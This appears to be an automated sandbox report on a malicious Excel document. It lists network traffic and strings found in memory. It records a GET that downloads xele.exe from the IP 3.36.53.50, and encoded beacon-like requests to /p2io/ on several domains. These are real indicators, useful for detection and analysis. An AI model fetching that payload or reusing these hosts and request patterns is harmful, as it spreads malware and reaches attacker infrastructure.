          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: unknownTCP traffic detected without corresponding DNS query: 3.36.53.50
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\75056775.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /dose/xele.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.36.53.50Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=DTtQlm+ek3aiRXh2XrobrkMYYvpq+NlfspfnNNuMzI98GFQb/uTk0N0e6q4XVVELH/G/Eg==&Mj=8pGl2P HTTP/1.1Host: www.hfjxhs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=tOwaJovwNhipp7Qdg3+vLu8KpTdHs2Vuljr6rtQHuYg94Ec45hj5yUBja0PUcN+7an3hSw==&Mj=8pGl2P HTTP/1.1Host: www.essentiallyourscandles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=OHUffbgoy2VqJ0zB09fk0Sz2RAv4pH8VLsbDGAU3/+1JsitNqq1vDuPE6GmoG7EUPLorsQ==&Mj=8pGl2P HTTP/1.1Host: www.brunoecatarina.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=tbodHACtgT9/nyAEdlemmH955SxRRtof3zi2445TBfF16F/HFiIOFMKIU8rcotkBv81FvA==&Mj=8pGl2P HTTP/1.1Host: www.zmzcrossrt.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?6lzd4R3=PONkgH6JO+VmGu/vZj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsPT0NTVR3XOxnye2KQ==&Mj=8pGl2P HTTP/1.1Host: www.cyrilgraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: unknownDNS traffic detected: queries for: www.hfjxhs.com
          Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.2172829427.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: http://instagram.com/casarpontocom
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000009.00000002.2350071899.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2152979155.0000000002331000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000009.00000000.2163853579.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000009.00000000.2161562073.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000009.00000000.2174122885.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: vbc.exe, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/PayrollManagerDBDataSet.xsd
          Source: explorer.exe, 00000009.00000000.2163213773.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
